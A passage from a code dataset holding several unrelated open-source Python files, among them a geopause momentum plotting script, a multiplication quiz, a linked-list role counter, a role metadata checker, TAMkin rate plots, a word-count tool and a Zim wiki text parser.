[0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration in the x-direction','body force fraction in the x-direction','friction in the x-direction'],['gyration in the z-direction','body force in the z-direction','friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n vmins=np.array([[-1.e7,-1.e7,-1.e5],[-1.e7,-1.e7,-1.e5]])\n vmaxs=np.array([[1.e7,1.e7,1.e5],[1e7,1.e7,1.e5]])\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n momx = gyrationcent[:,0,m]+bodyxx[:,m]+frictioncent[:,0,m]\n momz = gyrationcent[:,2,m]+bodyzz[:,m]+frictioncent[:,2,m]\n gyrfracx,gyrfracz = np.divide(gyrationcent[:,0,m],momx), np.divide(gyrationcent[:,2,m],momz)\n bodyfracx,bodyfracz = np.divide(bodyxx[:,m],momx), np.divide(bodyzz[:,m],momz)\n fricfracx,fricfracz = np.divide(frictioncent[:,0,m],momx), np.divide(frictioncent[:,2,m],momz)\n xx = np.array([[xc,xc,xc],[xc,xc,xc]])\n yy = np.array([[zc,zc,zc],[zc,zc,zc]])\n zz = np.array([[gyrfracx,bodyfracx,fricfracx],[gyrfracz,bodyfracz,fricfracz]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].scatter(xx[i,j],yy[i,j],c = zz[i,j],s=1,vmin=0,vmax=1,cmap='magma')\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('Absolute Abundance')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratio'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n \n return\nplotratiototal(1)\nplotratiototal(0)\n\n\nplotmomentum(0)\nplotmomentum(1)\n","repo_name":"sinhtrung/MomentumSourcesGeopause","sub_path":"momentumgeopause.py","file_name":"momentumgeopause.py","file_ext":"py","file_size_in_byte":30857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28953410585","text":"# This program will aks a user to enter the result of a multiplication\n# the user has 8 secomds to answer amd 3 tries\nimport pyinputplus as pyip\nimport random\nimport time\n\nnumberOfQuestions = 10\ncorrectAnswers = 0\nfor questionNumber in range(numberOfQuestions):\n # us random numbers\n num1 = random.randint(0, 9)\n num2 = random.randint(0, 9)\n\n prompt = \"#%s: %s x %s = \" % (questionNumber + 1, num1, num2)\n try:\n pyip.inputStr(prompt, allowRegexes=[\"^%s$\" % (\n num1 * num2)], blockRegexes=[(\".*\", \"Incorrect!\")], timeout=8, limit=3)\n except pyip.TimeoutException:\n print(\"Out of time\")\n except pyip.RetryLimitException:\n 
print(\"Out of tries\")\n else:\n print(\"Correct!\")\n correctAnswers += 1\n time.sleep(1)\nprint(\"Score: %s / %s\" % (correctAnswers, numberOfQuestions))\n","repo_name":"Jess247/python","sub_path":"python/atbsPy/projects/multiplication_quiz.py","file_name":"multiplication_quiz.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10903147435","text":"def get_roles_comunes(base):\n it_roles = base\n roles = {}\n while it_roles is not None:\n if it_roles.rol not in roles:\n roles[it_roles.rol] = 1\n else:\n roles[it_roles.rol] += 1\n it_roles = it_roles.next\n if base is not None:\n return roles\n else:\n return None\n\n\ndef print_roles_repetidos(roles):\n hay_duplicados = False\n if roles is None:\n print(\"No hay gente aun!!\")\n else:\n for rol_key in roles:\n actual_rol = roles[rol_key]\n if actual_rol > 1:\n hay_duplicados = True\n print(\"El rol numero \" + str(rol_key) + \" tiene \" + str(actual_rol) + \" personas.\")\n if not hay_duplicados:\n print(\"No hay roles duplicados\")\n\n\ndef print_esta_ordenada_por_roles(base):\n is_ordenada = True\n roles = get_roles_comunes(base) # {\"rol\": n° usuarios, ...}\n if roles is None:\n print(\"No hay usuarios aun...\")\n ite_roles = base\n # Compare each node's rol with the next node's rol to check the ordering\n while ite_roles is not None and ite_roles.next is not None:\n if ite_roles.rol > ite_roles.next.rol:\n is_ordenada = False\n break\n ite_roles = ite_roles.next\n if is_ordenada:\n print(\"Está ordenada por roles!\")\n else:\n print(\"No está ordenada por roles\")\n","repo_name":"LIbanezDev/data-structures-2020","sub_path":"simple_lists/first_exe/utils/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15198757325","text":"#!/usr/bin/python3\n\n\nimport sys\nimport yaml\n\nDISTROS = {\"fedora\": \"Fedora\", \"rhel\": \"EL\", \"centos\": \"EL\"}\n\n\ndef distro_to_platform(distro):\n \"\"\"convert distro (ID from os-release(5)) to platform used in role meta\"\"\"\n return DISTROS.get(distro, distro)\n\n\ndef role_supported_versions(metafile, distro):\n \"\"\"return a list of distribution versions that role's metadata claim to support\"\"\"\n with open(metafile, \"r\", encoding=\"utf8\") as file:\n meta = yaml.safe_load(file)\n distinfo = next(\n (\n item\n for item in meta[\"galaxy_info\"][\"platforms\"]\n if item[\"name\"] == distro_to_platform(distro)\n ),\n None,\n )\n if not distinfo:\n return []\n return distinfo[\"versions\"]\n\n\ndef version_match(version, meta_version):\n # could do more complicated matching, but for now assume that\n # meta_version is just a major version (single integer number) or wildcard\n return meta_version == \"all\" or version == str(meta_version)\n\n\ndef role_supported(metafile, distro, version):\n return any(\n (\n version_match(version, meta_version)\n for meta_version in role_supported_versions(metafile, distro)\n )\n )\n\n\nif __name__ == \"__main__\":\n USAGE = (\n f\"Usage: { sys.argv[0] } <role>/meta/main.yml distribution [majorversion]\"\n )\n\n # sanity-check arguments\n if len(sys.argv) not in (3, 4):\n print(\"Invalid arguments.\")\n print(USAGE)\n sys.exit(2)\n if len(sys.argv) == 3:\n print(role_supported_versions(sys.argv[1], sys.argv[2]))\n sys.exit(0)\n else:\n sys.exit(not role_supported(sys.argv[1], sys.argv[2], 
sys.argv[3]))\n","repo_name":"linux-system-roles/test-harness","sub_path":"test/checkmeta.py","file_name":"checkmeta.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"68"} +{"seq_id":"36363679954","text":"from __future__ import print_function\nfrom lot_basis import lots_list\nimport html\nfrom kin import *\n\nfrom molmod.units import kjmol\nfrom molmod.constants import boltzmann\n\nimport matplotlib.pyplot as pt, numpy\n\nfrom matplotlib.backend_bases import GraphicsContextBase\nGraphicsContextBase.dashd[\"dashed\"] = (0, (6.0, 3.0))\nGraphicsContextBase.dashd[\"dashdot\"] = (0, (4.0, 2.0, 1.0, 2.0))\nGraphicsContextBase.dashd[\"dotted\"] = (0, (1.5, 1.5))\n\n\n\n\ndef overview(template, title, fn_img, rows):\n if len(rows) == 0:\n rows.append([u\"Approach→
<br>Functional↓\"])\n rows.append([\"\"])\n rows[0].append(\"%s\" % title.replace(\", \", \"<br>
\"))\n for temp in temps:\n rows[1].append(\"%.0fK\" % temp)\n lines = []\n labels = []\n pt.clf()\n line = pt.plot(invtemps, experimental_k, color=\"k\", linestyle=\"-\", lw=4)\n lines.append(line)\n labels.append(\"experiment\")\n counter = 2\n for lot in lots_list:\n if lot.spin == \"ROS\":\n lot_label = \"ro\" + lot.label\n else:\n lot_label = lot.label\n if len(rows) <= counter:\n rows.append([\"%s\" % lot_label])\n try:\n ks = load_summary(template % lot_label)[0]\n line = pt.plot(invtemps, ks, color=lot.color, linestyle=lot.linestyle, lw=2)\n lines.append(line)\n labels.append(lot_label)\n for j in range(4):\n ln10ratio = numpy.log10(ks[j]/experimental_k[j])\n color = get_error_color(ln10ratio)\n rows[counter].append(\"%.0f\" % (color, ln10ratio*10))\n except (IOError, StopIteration):\n rows[counter].append(\"    \")\n counter += 1\n pt.semilogy()\n pt.fill(\n numpy.concatenate((invtemps, invtemps[::-1])),\n numpy.concatenate((experimental_k*10, experimental_k[::-1]/10)),\n \"k\", alpha=0.2, lw=0,\n )\n pt.xticks(\n 1/numpy.array([300, 350, 400, 450, 500, 550, 600], float),\n [\"300\", \"350\", \"400\", \"450\", \"500\", \"550\", \"600\"],\n )\n pt.title(title)\n pt.xlabel(\"T [K]\")\n pt.ylabel(\"k [(m**3/mol)/s]\")\n pt.ylim(1e-8,1e7)\n legend = pt.figlegend(\n lines, labels, (0.07,0.06), ncol=3, prop={\"size\":11},\n handlelength=3, labelspacing=0.1, columnspacing=1\n )\n #legend.get_frame().set_linewidth(0)\n legend.get_frame().set_fill(True)\n legend.get_frame().set_alpha(0.5)\n pt.savefig(fn_img % \"rates\")\n\n pt.clf()\n lines = []\n labels = []\n line = pt.plot([experimental_Ea], [experimental_A], color=\"k\", marker=\"o\", ms=11, mew=2, lw=0, ls=\" \")\n lines.append(line)\n labels.append(\"experiment\")\n for lot in lots_list:\n if lot.spin == \"ROS\":\n label = \"ro\" + lot.label\n else:\n label = lot.label\n try:\n A, Ea = load_summary(template % label)[1]\n marker = {\"-\": \"o\", \"--\": \"s\", \":\": \"v\", \"-.\": \"h\"}[lot.linestyle]\n line = pt.plot([Ea], [A], color=lot.color, marker=marker, ms=11, mew=2, lw=0, ls=\" \")\n lines.append(line)\n labels.append(label)\n continue\n except (IOError, StopIteration):\n pass\n\n pt.title(title)\n pt.xlabel(\"Activation energy [kJ/mol]\")\n pt.ylabel(\"Pre-exponential factor [(m**3/mol)/s]\")\n pt.semilogy()\n # error margin around experimental data point\n x = []\n y = []\n evals, evecs = numpy.linalg.eigh(covariance_parameters)\n angles = numpy.arange(0.0,360.5,1.0)/180*numpy.pi\n data = numpy.outer(evecs[:,0],numpy.cos(angles))*numpy.sqrt(evals[0]) + \\\n numpy.outer(evecs[:,1],numpy.sin(angles))*numpy.sqrt(evals[1])\n pt.fill(\n experimental_parameters[1] + data[1],\n numpy.exp(experimental_parameters[0] + data[0]),\n color=\"k\", alpha=0.2, lw=0\n )\n # end error margin\n legend = pt.legend(\n lines, labels, loc=4, ncol=4, prop={\"size\":11},\n handlelength=1, labelspacing=0.2, columnspacing=2,\n numpoints=1,\n )\n pt.xlim(0,90)\n pt.ylim(1e3,1e7)\n #legend.get_frame().set_linewidth(0)\n legend.get_frame().set_fill(True)\n legend.get_frame().set_alpha(0.5)\n pt.savefig(fn_img % \"params\")\n\n\n\n\nwith open(\"kintab.html\", \"w\") as f:\n print(html.header % \"KIN Overview\", file=f)\n\n for do_rotor in False, True:\n ir_str = {True: \"ir\", False: \"ho\"}[do_rotor]\n ir_info = {\n True: \"internal rotor\",\n False: \"harmonic oscillator\",\n }[do_rotor]\n for do_counterpoise in False, True:\n cp_str = {True: \"cps\", False: \"bss\"}[do_counterpoise]\n cp_info = {\n True: \"with counterpoise correction\",\n False: 
\"without counterpoise correction\",\n }[do_counterpoise]\n\n rows = []\n\n for ts_conformer in \"Gauche\", \"Trans\":\n overview(\n \"%%s__6-31gd/%s_%s_summary_%s.txt\" % (ir_str, cp_str, ts_conformer.lower()),\n \"%s, %s, %s, Consistent, 6-31G(d)\" % (ir_str.upper(), cp_str.upper(), ts_conformer),\n \"kin_%s_%s_%s_consistent_6-31gd_%%s.pdf\" % (ir_str, cp_str, ts_conformer.lower()),\n rows,\n )\n for ts_conformer in \"Gauche\", \"Trans\":\n overview(\n \"%%s__6-311+g3df2p/%s_%s_summary_%s.txt\" % (ir_str, cp_str, ts_conformer.lower()),\n \"%s, %s, %s, Consistent, 6-311+G(3df,2p)\" % (ir_str.upper(), cp_str.upper(), ts_conformer),\n \"kin_%s_%s_%s_consistent_6-311+g3df2p_%%s.pdf\" % (ir_str, cp_str, ts_conformer.lower()),\n rows,\n )\n for ts_conformer in \"Gauche\", \"Trans\":\n overview(\n \"GEO__b3lyp__6-31gd__ENERGY__%%s__6-311+g3df2p/%s_%s_summary_%s.txt\" % (ir_str, cp_str, ts_conformer.lower()),\n \"%s, %s, %s, GEO=B3LYP/6-31G(d), 6-311+G(3df,2p)\" % (ir_str.upper(), cp_str.upper(), ts_conformer),\n \"kin_%s_%s_%s_geo_6-311+g3df2p_%%s.pdf\" % (ir_str, cp_str, ts_conformer.lower()),\n rows,\n )\n\n print(\"
10Log10 of ratio between theoretical and experimental rate (%s, %s)
\" % (ir_info, cp_info), file=f)\n html.print_table(f, rows)\n\n print(html.footer, file=f)\n","repo_name":"molmod/tamkin","sub_path":"tamkin/examples/011_ethyl_ethene_lot/kintab.py","file_name":"kintab.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"13217104270","text":"import os\nimport glob\nimport shutil\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap as LSCm\nfrom scipy.interpolate import griddata\nfrom scipy.signal import savgol_filter\nfrom scipy import integrate\n\nfrom NesrHydrusAnalyst import *\n# src = '../Datasets/sample3d'\nsrc = '../Datasets/H3D2_SandDitch0011'\ndata_frame= read_hydrus_data(folder=src, save_to_csv=False, read_velocities=True)\ndf = data_frame\nprint(data_frame.shape)\n\ndebug = 1\n\nif debug == 0:\n v=0\n X, Z, M, x_vals, z_vals = get_grid_values(data_frame,variable=v)\n print(get_legend_range(np.nanmin(M), np.nanmax(M)),\n '\\nSahpes:\\nx_vals=> {}\\nz_vals=> {}\\nX=> {}\\nZ=> {}\\nM=> {}'.format(\n x_vals.shape, z_vals.shape,X.shape, Z.shape, M.shape))\nelif debug == 1:\n variable = 0 # Theta\n time_step = 180\n grid = 0.5 # cm\n crosses = 50. # cm0)]\n tol = 10.\n section = 'y'\n\n _ = draw_full_contour(\n df,\n variable,\n time_step,\n grid,\n crosses,\n tol,\n section,\n return_arrays=False,\n x_step=12,\n z_step=10,\n mirror_x=True,\n mirror_z=False,\n fig_size=get_fig_shape(df, section))","repo_name":"drnesr/SandDitch","sub_path":"Code/PyCharmTest2.py","file_name":"PyCharmTest2.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8498986841","text":"n, m = map(int, input().split())\r\n\r\narr_a = list()\r\n\r\nfor _ in range(n):\r\n arr_a.append(list(map(int, input())))\r\n\r\narr_b = list()\r\nfor _ in range(n):\r\n arr_b.append(list(map(int, input())))\r\n\r\ncount = 0\r\n\r\n\r\ndef flip_arr(x, y, arr_a):\r\n for i in range(x, x + 3):\r\n for j in range(y, y + 3):\r\n arr_a[i][j] = 1 - arr_a[i][j]\r\n\r\n\r\nfor i in range(n - 2):\r\n for j in range(m - 2):\r\n if (arr_a[i][j] != arr_b[i][j]):\r\n flip_arr(i, j, arr_a)\r\n count += 1\r\nflag = True\r\nfor i in range(n):\r\n for j in range(m):\r\n if (arr_a[i][j] != arr_b[i][j]):\r\n flag = False\r\n break\r\nif flag != True:\r\n count = -1\r\n\r\nprint(count)\r\n","repo_name":"augusstt06/Baekjoon","sub_path":"백준/Silver/1080. 
행렬/행렬.py","file_name":"행렬.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24063168185","text":"import sys\n\n\ndef count_lines(filename):\n\n opened_file = open(filename, \"r\")\n\n contents = opened_file.read()\n lines_count = contents.count(\"\\n\") + 1\n #counts the endline symbols and +1 for the 1st line\n opened_file.close()\n return lines_count\n\n\ndef count_chars(filename):\n chars_count = 0\n opened_file = open(filename, \"r\")\n for line in opened_file:\n chars_count += len(line)\n opened_file.close()\n return chars_count\n\n\ndef count_words(filename):\n words = []\n\n opened_file = open(filename, \"r\")\n\n for line in opened_file:\n line = line.split()\n for word in line:\n words.append(word)\n opened_file.close()\n return len(words)\n\n\ndef main():\n\n filename = sys.argv[2]\n if sys.argv[1] == \"chars\":\n print(count_chars(filename))\n\n elif sys.argv[1] == \"words\":\n print(count_words(filename))\n\n elif sys.argv[1] == \"lines\":\n print(count_lines(filename))\n\n else:\n print(\"Invalid command\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"UndestRoyable/HackBulgaria","sub_path":"week0/week0-file_system_problems/F6/wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"23308604227","text":"\nimport re\nimport logging\n\nimport xml.etree.ElementTree # needed to compile with cElementTree\ntry:\n\timport xml.etree.cElementTree as ElementTree\nexcept: #pragma: no cover\n\timport xml.etree.ElementTree as ElementTree\n\n\nfrom zim.errors import Error\n\nlogger = logging.getLogger('zim.parser')\n\n\ndef fix_unicode_chars(text):\n\t'''Fixes missing line end\n\t@param text: the input text\n\t@returns: the fixed text\n\t'''\n\t# These characters are recognized by \"splitlines()\" but not as end-of-line\n\t# in regexes. See also issue #1760\n\ttext = text.replace('\\u2028', '\\n') # LINE SEPARATOR\n\ttext = text.replace('\\u2029', ' ') # PARAGRAPH SEPARATOR\n\treturn text\n\n\ndef convert_space_to_tab(text, tabstop=4):\n\t'''Convert spaces to tabs\n\t@param text: the input text\n\t@param tabstop: the number of spaces to represent a tab\n\t@returns: the fixed text\n\t'''\n\t# Fix tabs\n\tspaces = ' ' * tabstop\n\tpattern = '(?m)^(\\t*)((?:%s)+)' % spaces\n\ttext = re.sub(\n\t\tpattern,\n\t\tlambda m: m.group(1) + '\\t' * (len(m.group(2)) // tabstop),\n\t\ttext\n\t)\n\t# Specify \"(?m)\" instead of re.M since \"flags\" keyword is not\n\t# supported in python 2.6\n\n\treturn text\n\n\nclass Builder(object):\n\t'''This class defines a 'builder' interface for parse trees. 
It is\n\tused by the parser to construct the parse tree while keeping the\n\tparser objects agnostic of how the resulting parse tree objects\n\tlook.\n\t'''\n\n\tdef start(self, tag, attrib=None):\n\t\t'''Start formatted region\n\t\t@param tag: the tag name\n\t\t@param attrib: optional dict with attributes\n\t\t@implementation: must be implemented by sub-classes\n\t\t'''\n\t\traise NotImplementedError\n\n\tdef text(self, text):\n\t\t'''Append text\n\t\t@param text: text to be appended as string\n\t\t@implementation: must be implemented by sub-classes\n\t\t'''\n\t\traise NotImplementedError\n\n\tdef end(self, tag):\n\t\t'''End formatted region\n\t\t@param tag: the tag name\n\t\t@raises XXX: when tag does not match current state\n\t\t@implementation: must be implemented by sub-classes\n\t\t'''\n\t\traise NotImplementedError\n\n\tdef append(self, tag, attrib=None, text=None):\n\t\t'''Convenience function to open a tag, append text and close\n\t\tit immediately. Only used for formatted text that has no\n\t\tsub-processing done.\n\t\t@param tag: the tag name\n\t\t@param attrib: optional dict with attributes\n\t\t@param text: formatted text\n\t\t@implementation: optional for subclasses, default implementation\n\t\tcalls L{start()}, L{text()}, and L{end()}\n\t\t'''\n\t\tself.start(tag, attrib)\n\t\tif not text is None:\n\t\t\tself.text(text)\n\t\tself.end(tag)\n\n\nclass BuilderTextBuffer(Builder):\n\t'''Wrapper that buffers text going to a L{Builder} object\n\tsuch that the last piece of text remains accessible for inspection\n\tand can be modified.\n\t'''\n\n\tdef __init__(self, builder):\n\t\tself.builder = builder\n\t\tself.buffer = []\n\n\t# Interface to handle text buffer\n\n\tdef get_text(self):\n\t\treturn ''.join(self.buffer)\n\n\tdef set_text(self, text):\n\t\tself.buffer = [text]\n\n\tdef clear_text(self):\n\t\tself.buffer = []\n\n\tdef flush(self):\n\t\ttext = ''.join(self.buffer)\n\t\tif text:\n\t\t\tself.builder.text(text)\n\t\tself.buffer = []\n\n\t# Builder interface\n\n\tdef start(self, tag, attrib=None):\n\t\tif self.buffer:\n\t\t\tself.flush()\n\t\tself.builder.start(tag, attrib)\n\n\tdef end(self, tag):\n\t\tif self.buffer:\n\t\t\tself.flush()\n\t\tself.builder.end(tag)\n\n\tdef text(self, text):\n\t\tself.buffer.append(text)\n\n\tdef append(self, tag, attrib=None, text=None):\n\t\tif self.buffer:\n\t\t\tself.flush()\n\t\tself.builder.append(tag, attrib, text)\n\n\nclass SimpleTreeElement(list):\n\n\t# Not unlike the Element class of xml.etree, but without the\n\t# \"text\" and \"tail\" attributes - text is just part of the list.\n\t# This makes processing so much easier...\n\n\t__slots__ = ('tag', 'attrib')\n\n\tdef __init__(self, tag, attrib=None, children=None):\n\t\tself.tag = tag\n\t\tself.attrib = attrib\n\t\tif children:\n\t\t\tself.extend(children)\n\n\tdef get(self, attr, default=None):\n\t\tif self.attrib:\n\t\t\treturn self.attrib.get(attr, default)\n\t\telse:\n\t\t\treturn default\n\n\tdef __eq__(self, other):\n\t\tif self.tag == other.tag \\\n\t\tand self.attrib == other.attrib \\\n\t\tand len(self) == len(other):\n\t\t\treturn all(s == o for s, o in zip(self, other))\n\t\telse:\n\t\t\treturn False\n\n\tdef __repr__(self):\n\t\tif len(self) > 0:\n\t\t\treturn '<%s:\\n%s>' % (self.__class__.__name__, self.pprint(level=1))\n\t\telse:\n\t\t\treturn '<%s: %s>' % (self.__class__.__name__, self.pprint(level=0).strip())\n\n\tdef __str__(self):\n\t\treturn self.__repr__()\n\n\tdef pprint(self, level=0):\n\t\t'''Returns pretty-printed text representation'''\n\t\tprefix = ' ' * level\n\t\tif 
len(self) > 0:\n\t\t\tlines = [prefix + '%s %r [\\n' % (self.tag, self.attrib)]\n\t\t\tfor item in self:\n\t\t\t\tif isinstance(item, SimpleTreeElement):\n\t\t\t\t\tlines.append(item.pprint(level=level + 1))\n\t\t\t\telif isinstance(item, str):\n\t\t\t\t\tfor line in item.splitlines(True):\n\t\t\t\t\t\tlines.append(prefix + ' %r\\n' % line)\n\t\t\t\telse:\n\t\t\t\t\tlines.append(prefix + ' %r\\n' % item)\n\t\t\tlines.append(prefix + ']\\n')\n\t\t\treturn ''.join(lines)\n\t\telse:\n\t\t\treturn prefix + '%s %r []\\n' % (self.tag, self.attrib)\n\n\nclass SimpleTreeBuilder(Builder):\n\t'''Builder class that builds a tree of L{SimpleTreeElement}s'''\n\n\tdef __init__(self, elementfactory=SimpleTreeElement):\n\t\tself.elementfactory = elementfactory\n\t\tself.root = []\n\t\tself.stack = [self.root]\n\t\tself.merge_text = False\n\n\tdef get_root(self):\n\t\tif not len(self.stack) == 1:\n\t\t\traise AssertionError('Did not finish processing')\n\t\treturn self.root\n\n\t# Builder interface\n\n\tdef start(self, tag, attrib=None):\n\t\telement = self.elementfactory(tag, attrib)\n\t\tself.stack[-1].append(element)\n\t\tself.stack.append(element)\n\n\tdef end(self, tag):\n\t\telement = self.stack.pop()\n\t\tif element.tag != tag:\n\t\t\traise AssertionError('Unmatched %s at end of %s' % (element.tag, tag))\n\n\tdef text(self, text):\n\t\tself.stack[-1].append(text)\n\n\tdef append(self, tag, attrib=None, text=None):\n\t\telement = self.elementfactory(tag, attrib)\n\t\tif text:\n\t\t\telement.append(text)\n\t\tself.stack[-1].append(element)\n\n\nclass ParserError(Error):\n\n\tdef __init__(self, msg):\n\t\tError.__init__(self, msg)\n\n\t\tself.parser_file = _('<unknown>') # T: placeholder for unknown file name\n\t\tself.parser_text = ''\n\t\tself.parser_line_offset = (0, 0)\n\n\t@property\n\tdef description(self):\n\t\treturn _('Error in %(file)s at line %(line)i near \"%(snippet)s\"') % {\n\t\t\t'file': self.parser_file,\n\t\t\t'line': self.parser_line_offset[0],\n\t\t\t'snippet': self.parser_text.strip(),\n\t\t}\n\t\t\t# T: Extended error message while parsing a file, gives file name, line number and words where error occurred\n\n\nclass Rule(object):\n\t'''Class that defines a single parser rule. Typically used\n\tto define a regex pattern for one specific wiki format string\n\tand the processing to be done when this formatting is encountered\n\tin the text.\n\n\t@ivar tag: L{Builder} tag for result of this rule. Used by the\n\tdefault process method.\n\t@ivar pattern: the regular expression for this parser as string\n\t@ivar process: function (or object) to process matched text, or C{None}\n\tThe function should take a L{Builder} object as first argument,\n\tfollowed by one or more parameters for matched groups in the\n\tregular expression. If the regex pattern has no capturing groups\n\tthis function is called with the whole match.\n\tThe default function will use the C{tag} and C{descent}\n\tattributes\n\t@ivar descent: optional function (or object) to recursively parse the\n\ttext matched by this rule. Called in the same way as C{process}.\n\t'''\n\n\tdef __init__(self, tag, pattern, process=None, descent=None):\n\t\t'''Constructor\n\t\t@param tag: L{Builder} tag for result of this rule. 
Used by the\n\t\tdefault process method.\n\t\t@param pattern: regex pattern as string\n\t\t@param process: optional function to process matched text\n\t\t@param descent: optional function to recursively parse matched text\n\t\t'''\n\t\tassert tag is not None or process is not None, 'Need at least a tag or a process method'\n\t\tself._re = None\n\t\tself.tag = tag\n\t\tif isinstance(pattern, str):\n\t\t\tself.pattern = pattern\n\t\telse:\n\t\t\tself.pattern = pattern.pattern # Assume compiled regular expression\n\t\tself.descent = descent\n\t\tself.process = process or self._process\n\n\tdef __repr__(self):\n\t\treturn '<%s: %s: %s>' % (self.__class__.__name__, self.tag, self.pattern)\n\n\tdef __or__(self, other):\n\t\t'''Allow new parsers to be constructed by combining parser\n\t\tobjects with the \"|\" operator.\n\t\t'''\n\t\treturn Parser(self, other)\n\n\tdef _process(self, builder, text):\n\t\t# default action for matched text\n\t\tif self.descent:\n\t\t\tbuilder.start(self.tag)\n\t\t\tself.descent(builder, text)\n\t\t\tbuilder.end(self.tag)\n\t\telse:\n\t\t\tbuilder.append(self.tag, None, text)\n\n\nclass Parser(object):\n\t'''Parser class that matches multiple rules at once. It will\n\tcompile the patterns of various rules into a single regex and\n\tbased on the match call the correct rules for processing.\n\n\t@ivar rules: list with L{Rule} objects, can be modified until the\n\tparser is used for the first time for parsing (the attribute\n\tbecomes a tuple afterwards)\n\t@ivar process_unmatched: function (or object) to process un-matched\n\ttext, or C{None}.\n\tThe function should take a L{Builder} object as first argument,\n\tfollowed by one or more parameters for matched groups in the\n\tregular expression.\n\t'''\n\n\tdef __init__(self, *rules):\n\t\t'''Constructor\n\t\t@param rules: list of rules to match (each should derive from\n\t\tL{SimpleReParser}, so be either a single rule, or a compound\n\t\trule.)\n\t\t'''\n\t\tself.rules = [] #: sub rules\n\t\tself.process_unmatched = self._process_unmatched\n\t\tself._re = None\n\n\t\tfor rule in rules:\n\t\t\tif isinstance(rule, Parser):\n\t\t\t\tself.rules.extend(list(rule.rules))\n\t\t\telse:\n\t\t\t\tassert isinstance(rule, Rule)\n\t\t\t\tself.rules.append(rule)\n\n\t\tassert self.rules, 'No rules defined for this parser'\n\n\tdef _process_unmatched(self, builder, text):\n\t\t# default action for unmatched text\n\t\tbuilder.text(text)\n\n\tdef __or__(self, other):\n\t\t'''Allow new parsers to be constructed by combining parser\n\t\tobjects with the \"|\" operator.\n\t\t'''\n\t\treturn self.__class__(self, other)\n\t\t\t# Return extended copy, not modify self\n\t\t\t# __init__ of new instance will make a copy of our rules\n\n\tdef __call__(self, builder, text):\n\t\t'''Each parser object is callable so it can be used as a\n\t\tprocessing function in any other parser object. 
This method\n\t\tparses the given text and calls the appropriate methods of the\n\t\tL{Builder} object to construct the parse results.\n\n\t\t@param builder: a L{Builder} object\n\t\t@param text: to be parsed text as string\n\t\t'''\n\t\tif not text:\n\t\t\tlogger.warning('Parser got empty string')\n\t\t\treturn\n\n\t\tif self._re is None:\n\t\t\t# Generate the regex and cache it for re-use\n\t\t\tself.rules = tuple(self.rules) # freeze list\n\t\t\tpattern = r'|'.join([\n\t\t\t\tr\"(?P<rule%i>%s)\" % (i, r.pattern)\n\t\t\t\t\tfor i, r in enumerate(self.rules)\n\t\t\t])\n\t\t\t#print('PATTERN:\\n', pattern.replace(')|(', ')\\t|\\n('), '\\n...')\n\t\t\tself._re = re.compile(pattern, re.U | re.M | re.X)\n\n\t\titer = 0\n\t\tend = len(text)\n\t\tmatch = self._re.search(text, iter)\n\t\twhile match:\n\t\t\tmstart, mend = match.span()\n\t\t\tif mstart > iter:\n\t\t\t\ttry:\n\t\t\t\t\tself.process_unmatched(builder, text[iter:mstart])\n\t\t\t\texcept Exception as error:\n\t\t\t\t\tself._raise_exception(error, text, iter, mstart, builder)\n\n\t\t\tname = match.lastgroup # named outer group\n\t\t\ti = int(name[4:]) # name is e.g. \"rule1\"\n\t\t\tgroups = [g for g in match.groups() if g is not None]\n\t\t\tif len(groups) > 1:\n\t\t\t\tgroups.pop(0) # get rid of named outer group if inner groups are defined\n\n\t\t\tself._backup_iter = 